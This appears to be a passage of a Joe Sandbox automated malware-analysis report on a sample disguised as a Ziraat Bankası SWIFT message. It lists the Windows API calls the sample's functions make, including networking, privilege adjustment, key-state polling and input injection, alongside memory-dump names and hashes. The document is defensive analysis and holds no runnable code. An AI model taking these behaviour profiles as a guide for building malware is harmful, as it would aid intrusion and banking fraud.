                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1605983538-0
                                                                                                                                                        • Opcode ID: 45f821d77d1d0f79f305f550290d673c178ac9a5c81520f3a6c2d2b17c32bf4e
                                                                                                                                                        • Instruction ID: 45e7f6f379e2fefbc329237ef5dc9e2f57e327b94e852ec4b79cb6203d035057
                                                                                                                                                        • Opcode Fuzzy Hash: 45f821d77d1d0f79f305f550290d673c178ac9a5c81520f3a6c2d2b17c32bf4e
                                                                                                                                                        • Instruction Fuzzy Hash: B721A771900218ABDB20ABE4DC88FDDB7FCAB09300F6000A9F545E7141DBB19F85CB61
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000DA82C: inet_addr.WSOCK32(00000000), ref: 000DA84E
                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 000D9296
                                                                                                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 000D92B9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4170576061-0
                                                                                                                                                        • Opcode ID: 437eead9e32cb0ffbe3f255da28601ece6b55259ca0e3889feaa067ee27249db
                                                                                                                                                        • Instruction ID: 59d2dc17e73a04dbf525aba01864885dff51312c7fea97cb9b4896f1916014fa
                                                                                                                                                        • Opcode Fuzzy Hash: 437eead9e32cb0ffbe3f255da28601ece6b55259ca0e3889feaa067ee27249db
                                                                                                                                                        • Instruction Fuzzy Hash: 1341C070600200AFDB14BB68CC82EBE77EDEF44728F044459F956AB383DB749E419BA1
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 000CEB8A
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000CEBBA
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000CEBCF
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000CEBE0
                                                                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 000CEC0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2387731787-0
                                                                                                                                                        • Opcode ID: 75d1e9101a4fe5619f5d355c2b6c5cb4bfed2e3260d0fa55d0e5278fdaf11080
                                                                                                                                                        • Instruction ID: fdb0d4ef1403e3339506f1b5635473680195d7be455042ac72acbf863f24fbf8
                                                                                                                                                        • Opcode Fuzzy Hash: 75d1e9101a4fe5619f5d355c2b6c5cb4bfed2e3260d0fa55d0e5278fdaf11080
                                                                                                                                                        • Instruction Fuzzy Hash: D941AC75600602DFCB18DF68C491EAEB7E4FF49324F10455DE96A8B3A2DB31E981CB91
                                                                                                                                                        APIs
                                                                                                                                                        • GetCursorPos.USER32(000000FF), ref: 0009B64F
                                                                                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0009B66C
                                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 0009B691
                                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 0009B69F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4210589936-0
                                                                                                                                                        • Opcode ID: e9f77112ea6d2061462f9c64a3a7f2d8b1c6186daf906ab6683ae798f9b1c6d7
                                                                                                                                                        • Instruction ID: 2bf51be2a989cfa429ac0fd91735d9180343f6c5b8c9f40a5644f9640469c06d
                                                                                                                                                        • Opcode Fuzzy Hash: e9f77112ea6d2061462f9c64a3a7f2d8b1c6186daf906ab6683ae798f9b1c6d7
                                                                                                                                                        • Instruction Fuzzy Hash: F7418E35508119BFCF159F64C844EEDBBB5BB05324F10432AE869922E0CB34A994EF91
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0009E014,771B0AE0,0009DEF1,0011DC38,?,?), ref: 0009E02C
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0009E03E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                                                        • Opcode ID: a477f7dce2030742f192c92c7535ca7ec09638a1ec068c6ad232bcfe476f05ce
                                                                                                                                                        • Instruction ID: 55a8f19c375d22b00fae1e3d6b2fb080b21af6aa970aa9d6a46e016d9b21d5b2
                                                                                                                                                        • Opcode Fuzzy Hash: a477f7dce2030742f192c92c7535ca7ec09638a1ec068c6ad232bcfe476f05ce
                                                                                                                                                        • Instruction Fuzzy Hash: 6FD0A7304007129FCB31AFA1FC0961276D5AB04301F188429E4C1D25A0FBF4CCC08650
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000BAA79
                                                                                                                                                          • Part of subcall function 000BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000BAA83
                                                                                                                                                          • Part of subcall function 000BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000BAA92
                                                                                                                                                          • Part of subcall function 000BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000BAA99
                                                                                                                                                          • Part of subcall function 000BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000BAAAF
                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,000BADE4,?,?), ref: 000BB21B
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000BB227
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 000BB22E
                                                                                                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 000BB247
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4217664535-0
                                                                                                                                                        • Opcode ID: 8346d88b7dba1e87ac56b0662b5c953c7ce33a8a21650698e888bfb2f7ebc966
                                                                                                                                                        • Instruction ID: c068b037d1d2560ba95da2ac26919ae85f9dc2f6eda284f12e081eacde8a738a
                                                                                                                                                        • Opcode Fuzzy Hash: 8346d88b7dba1e87ac56b0662b5c953c7ce33a8a21650698e888bfb2f7ebc966
                                                                                                                                                        • Instruction Fuzzy Hash: DA119E71A00205EFDB149F98DC85AEEB7E9EF95304F14802DE98297211D7B1AE84CB20
                                                                                                                                                        APIs
                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 000C13DC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                        • String ID: ($|
                                                                                                                                                        • API String ID: 1659193697-1631851259
                                                                                                                                                        • Opcode ID: fa8a3e9911030b5596ed1b4c6d75a0021293980280243a9aac0242d925149be9
                                                                                                                                                        • Instruction ID: 528440eac43490d8bcdb42a89a9426593c38d58c7c7e45f462fe97e5fecc5229
                                                                                                                                                        • Opcode Fuzzy Hash: fa8a3e9911030b5596ed1b4c6d75a0021293980280243a9aac0242d925149be9
                                                                                                                                                        • Instruction Fuzzy Hash: 76321475A046059FCB28CF69C480EAAB7F0FF49320B15C56EE59ADB3A2D770E941CB44
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F
                                                                                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 0009B22F
                                                                                                                                                          • Part of subcall function 0009B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0009B5A5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Proc$LongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2749884682-0
                                                                                                                                                        • Opcode ID: 357e3614c41f74d56b5eae659865f0b78d62e719ab94dbf8034664b4224d49a8
                                                                                                                                                        • Instruction ID: 7220eb3c1a005216183d0a179d6e36d9ee5d7b04787a99644b1789a4b0ab3ef8
                                                                                                                                                        • Opcode Fuzzy Hash: 357e3614c41f74d56b5eae659865f0b78d62e719ab94dbf8034664b4224d49a8
                                                                                                                                                        • Instruction Fuzzy Hash: 15A17B70114149BADF78AF6ABE88EBF39DDEB42760B50411DF501E29B3CB149D00B272
                                                                                                                                                        APIs
                                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000D43BF,00000000), ref: 000D4FA6
                                                                                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 000D4FD2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 599397726-0
                                                                                                                                                        • Opcode ID: 58aa558d3c6d7fcdffdfbab08b1d7e957b29fa5f8fc8a5e1fa725f2b01694ae5
                                                                                                                                                        • Instruction ID: d6e186ba5dd68b03dfc885829a068292add6d929a42b1aa8fab1dad6413a5046
                                                                                                                                                        • Opcode Fuzzy Hash: 58aa558d3c6d7fcdffdfbab08b1d7e957b29fa5f8fc8a5e1fa725f2b01694ae5
                                                                                                                                                        • Instruction Fuzzy Hash: D141C371504709BFEB209F94DC85EBFB7FCEB40759F10402BF605A6291EA719E4196B0
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 000CE20D
                                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000CE267
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 000CE2B4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1682464887-0
                                                                                                                                                        • Opcode ID: 0e657a1e34d76032e08672d895af5918179c2ccdb929c5277b0747635cabe3fa
                                                                                                                                                        • Instruction ID: 4a7796efe4930f4ef5f22f7c25b900d7e8cb5d7d8b3d139c332056ba87e30333
                                                                                                                                                        • Opcode Fuzzy Hash: 0e657a1e34d76032e08672d895af5918179c2ccdb929c5277b0747635cabe3fa
                                                                                                                                                        • Instruction Fuzzy Hash: BC213C75A00118EFDB00EFA5D885EEDFBB8FF48314F0484A9E945A7252DB319945CB50
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
                                                                                                                                                          • Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533
                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BB180
                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BB1AD
                                                                                                                                                        • GetLastError.KERNEL32 ref: 000BB1BA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1922334811-0
                                                                                                                                                        • Opcode ID: 04f4546dd4a1c25380a2d4ddc72ca3cd4e36490dd5c317341c75e952b8574e5d
                                                                                                                                                        • Instruction ID: 90611cf94123f7d3462baad57d5b754d23dc19effd26130c979cce03fbc9d63a
                                                                                                                                                        • Opcode Fuzzy Hash: 04f4546dd4a1c25380a2d4ddc72ca3cd4e36490dd5c317341c75e952b8574e5d
                                                                                                                                                        • Instruction Fuzzy Hash: 2F118FB1504605AFE7189F68EC85D6BB7BDFB44710B20892EF49697641DBB0FC418B60
                                                                                                                                                        APIs
                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000C7223
                                                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000C723A
                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 000C724A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3429775523-0
                                                                                                                                                        • Opcode ID: ec122a4ed30714feb4e5696760773bedf4a89828dea0ba888dd80b901247c307
                                                                                                                                                        • Instruction ID: d74c9aa4a053ae408789c38875a7c99a1ff60873a576341bb7bd2d66f20505b3
                                                                                                                                                        • Opcode Fuzzy Hash: ec122a4ed30714feb4e5696760773bedf4a89828dea0ba888dd80b901247c307
                                                                                                                                                        • Instruction Fuzzy Hash: 31F01D76A04209BFDF04DFE4DD89EEEBBB8EF08201F104469B606E2591E2709A448B10
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 000CF599
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000CF5C9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                        • Opcode ID: c60176f95fbf315dd554f2ecaf5a5269479e97832b0fc5536ca72fce2f257e85
                                                                                                                                                        • Instruction ID: 48c5b87a1a6713652d2cb60dd8edd680e45753dc59ea4a9c3567a91fabc202c8
                                                                                                                                                        • Opcode Fuzzy Hash: c60176f95fbf315dd554f2ecaf5a5269479e97832b0fc5536ca72fce2f257e85
                                                                                                                                                        • Instruction Fuzzy Hash: A711A1726006009FDB10EF28D845E6EB3E9FF98324F00895EF9A9D7291CB70E9018B81
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,000DBE6A,?,00000000,00000000,?), ref: 000CCEA7
                                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,000DBE6A,?,00000000,00000000,?), ref: 000CCEB9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                        • Opcode ID: 96a1511786418f200f1e888da2a4ca0842ad78ba39efe61aaa00f15d5366f7c3
                                                                                                                                                        • Instruction ID: 76abceb3f3908b19b91e575a149989f4a13d983fed2f9939faa243f932e3920b
                                                                                                                                                        • Opcode Fuzzy Hash: 96a1511786418f200f1e888da2a4ca0842ad78ba39efe61aaa00f15d5366f7c3
                                                                                                                                                        • Instruction Fuzzy Hash: 4EF08275100229ABEB20ABE4DC49FEE776DBF09391F004166F959D6181D7709A40CBA4
                                                                                                                                                        APIs
                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000C4153
                                                                                                                                                        • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 000C4166
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                                        • Opcode ID: e7a5ab19187257ddb031508dc40da613b6e6647b4137ebcd3d6873ffeced98c7
                                                                                                                                                        • Instruction ID: 6128aff8e51329f4da7b7f2b8075da3f077e7ff190f5ad942c9af82c56cc5d33
                                                                                                                                                        • Opcode Fuzzy Hash: e7a5ab19187257ddb031508dc40da613b6e6647b4137ebcd3d6873ffeced98c7
                                                                                                                                                        • Instruction Fuzzy Hash: CBF0677080024DAFDB159FA0CC05BBE7FB0FF00305F04800AFDA6A6192D7B986529FA0
                                                                                                                                                        APIs
